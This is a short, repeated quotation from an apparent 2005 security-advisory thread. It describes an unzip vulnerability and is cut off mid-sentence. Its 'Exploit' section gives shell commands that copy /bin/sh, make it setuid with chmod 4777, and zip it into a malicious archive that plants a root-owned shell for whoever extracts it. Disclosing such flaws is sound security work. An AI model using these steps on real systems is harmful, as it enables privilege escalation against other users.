On 28 Feb 2005, at 08:17, Albert Puigsech Galicia wrote:
>
> III. Exploit
>
> It's realy easy to test this vulnerability. You can create a malicious
> ZIP
> file following this example:
>
> $ cp /bin/sh .
> $ chmod 4777 sh
> $ zip malicious.zip sh
>
>
> When another user (including root) unpacks...
>
> III. Exploit
>
> It's realy easy to test this vulnerability. You can create a malicious
> ZIP
> file following this example:
>
> $ cp /bin/sh .
> $ chmod 4777 sh
> $ zip malicious.zip sh
>
>
> When another user (including root) unpacks...
[ more ]